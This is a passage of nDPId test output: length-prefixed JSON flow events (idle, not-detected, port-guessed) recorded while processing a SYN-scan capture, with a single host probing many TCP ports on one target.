+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 